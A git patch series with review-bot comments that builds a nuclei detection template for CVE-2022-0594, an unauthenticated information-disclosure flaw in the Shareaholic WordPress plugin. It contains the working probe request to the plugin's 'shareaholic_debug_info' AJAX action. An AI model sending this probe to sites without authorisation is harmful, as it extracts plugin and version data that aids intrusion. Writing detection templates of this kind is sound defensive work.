From 9e1fd3e1afe89a1a6b67d7a64629ff170da0e264 Mon Sep 17 00:00:00 2001 From: atomic <75549184+atomiczsec@users.noreply.github.com> Date: Fri, 29 Jul 2022 13:40:41 -0400 Subject: [PATCH 1/5] Add files via upload --- cves/2022/CVE-2022-0594.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cves/2022/CVE-2022-0594.yaml diff --git a/cves/2022/CVE-2022-0594.yaml b/cves/2022/CVE-2022-0594.yaml new file mode 100644 index 0000000000..d329da3ae9 --- /dev/null +++ b/cves/2022/CVE-2022-0594.yaml @@ -0,0 +1,23 @@ +id: CVE-2022-0594 +info: + name: CVE-2022-0594 + author: atomiczsec + severity: low + description: Shareaholic < 9.7.6 - Information Disclosure + reference: + - https://wpscan.com/vulnerability/4de9451e-2c8d-4d99-a255-b027466d29b1 + tags: config,exposure +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - 'plugin_version' \ No newline at end of file From d52273398f96e4a715c90a61adc127d9475e41ea Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 29 Jul 2022 23:19:03 +0530 Subject: [PATCH 2/5] Update CVE-2022-0594.yaml --- cves/2022/CVE-2022-0594.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-0594.yaml b/cves/2022/CVE-2022-0594.yaml index d329da3ae9..29595daf09 100644 --- a/cves/2022/CVE-2022-0594.yaml +++ b/cves/2022/CVE-2022-0594.yaml @@ -11,7 +11,7 @@ requests: - method: GET path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info" - + matchers-condition: and matchers: - type: status @@ -20,4 +20,4 @@ requests: - type: word part: body words: - - 'plugin_version' \ No newline at end of file + - 'plugin_version' From e734093963298d0b2112bb89ead73344d14ed4ea Mon Sep 17 00:00:00 2001 
From: Dhiyaneshwaran Date: Fri, 29 Jul 2022 23:19:20 +0530 Subject: [PATCH 3/5] Update CVE-2022-0594.yaml --- cves/2022/CVE-2022-0594.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-0594.yaml b/cves/2022/CVE-2022-0594.yaml index 29595daf09..0826f7cef2 100644 --- a/cves/2022/CVE-2022-0594.yaml +++ b/cves/2022/CVE-2022-0594.yaml @@ -20,4 +20,4 @@ requests: - type: word part: body words: - - 'plugin_version' + - 'plugin_version' From fcafc95129e939288bd416017ff8b5f8119ebca7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 29 Jul 2022 23:24:58 +0530 Subject: [PATCH 4/5] Update CVE-2022-0594.yaml --- cves/2022/CVE-2022-0594.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-0594.yaml b/cves/2022/CVE-2022-0594.yaml index 0826f7cef2..6b20e786d7 100644 --- a/cves/2022/CVE-2022-0594.yaml +++ b/cves/2022/CVE-2022-0594.yaml @@ -6,7 +6,11 @@ info: description: Shareaholic < 9.7.6 - Information Disclosure reference: - https://wpscan.com/vulnerability/4de9451e-2c8d-4d99-a255-b027466d29b1 - tags: config,exposure + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0594 + metadata: + verified: true + tags: wordpress,wp,wp-plugin,exposure + requests: - method: GET path: @@ -21,3 +25,4 @@ requests: part: body words: - 'plugin_version' + - 'shareaholic_server_reachable' From 08385e9fc0ebd6ffb47c1fc7207ea9debd066de1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 29 Jul 2022 23:44:41 +0530 Subject: [PATCH 5/5] Update CVE-2022-0594.yaml --- cves/2022/CVE-2022-0594.yaml | 21 +++++++++++++++------ 1 file changed, 15 insertions(+), 6 deletions(-) diff --git a/cves/2022/CVE-2022-0594.yaml b/cves/2022/CVE-2022-0594.yaml index 6b20e786d7..067283356c 100644 --- a/cves/2022/CVE-2022-0594.yaml +++ b/cves/2022/CVE-2022-0594.yaml 
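Review bot: The second entry added under `words` (`'shareaholic_server_reachable'`) does not tighten the body matcher, because a nuclei word matcher combines its entries with `or` unless a condition is given, so a 200 response that contains only the generic string `plugin_version` still matches. Adding `condition: and` under that list makes both markers mandatory and removes false positives from unrelated endpoints that echo a plugin version; [PATCH 5/5] in this series does add it. The `- type: word` matcher itself starts above this hunk.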
@@ -1,15 +1,16 @@ id: CVE-2022-0594 info: - name: CVE-2022-0594 + name: Shareaholic < 9.7.6 - Information Disclosure author: atomiczsec severity: low - description: Shareaholic < 9.7.6 - Information Disclosure + description: The Professional Social Sharing Buttons, Icons & Related Posts WordPress plugin before 9.7.6 does not have proper authorisation check in one of the AJAX action, available to unauthenticated (in v < 9.7.5) and author+ (in v9.7.5) users, allowing them to call it and retrieve various information such as the list of active plugins, various version like PHP, cURL, WP etc. reference: - https://wpscan.com/vulnerability/4de9451e-2c8d-4d99-a255-b027466d29b1 + - https://wordpress.org/plugins/shareaholic/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0594 metadata: verified: true - tags: wordpress,wp,wp-plugin,exposure + tags: cve,cve2022,wordpress,wp,wp-plugin,exposure requests: - method: GET @@ -18,11 +19,19 @@ requests: matchers-condition: and matchers: - - type: status - status: - - 200 + - type: word part: body words: - 'plugin_version' - 'shareaholic_server_reachable' + condition: and + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200
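Review bot: The `info` block in the first hunk of [PATCH 5/5] still has no `classification` section, so tooling that filters or prioritises findings by CVE id or CVSS gets nothing machine-readable even though the id and the new `cve,cve2022` tags name the CVE. I would add `classification:` with `cve-id: CVE-2022-0594` plus the CWE and CVSS fields copied from the NVD record, and confirm that `severity: low` agrees with that score. The new `description` also deserves a wording pass, e.g. "in one of the AJAX action" should read "on one of its AJAX actions".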
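Review bot: The matchers in the second hunk of [PATCH 5/5] evaluate a request sent without any session (the `path` line sits just above the hunk), so by the description added in the same patch the template can only match installs before 9.7.5. On 9.7.5 the action is limited to author+ users and the template stays silent although that version is still affected. This false negative should be documented next to the request, for example `# Unauthenticated probe: matches versions before 9.7.5 only; 9.7.5 exposes the action to author+ users and will not match.` A non-match is therefore inconclusive until the installed plugin version is confirmed to be 9.7.6 or later.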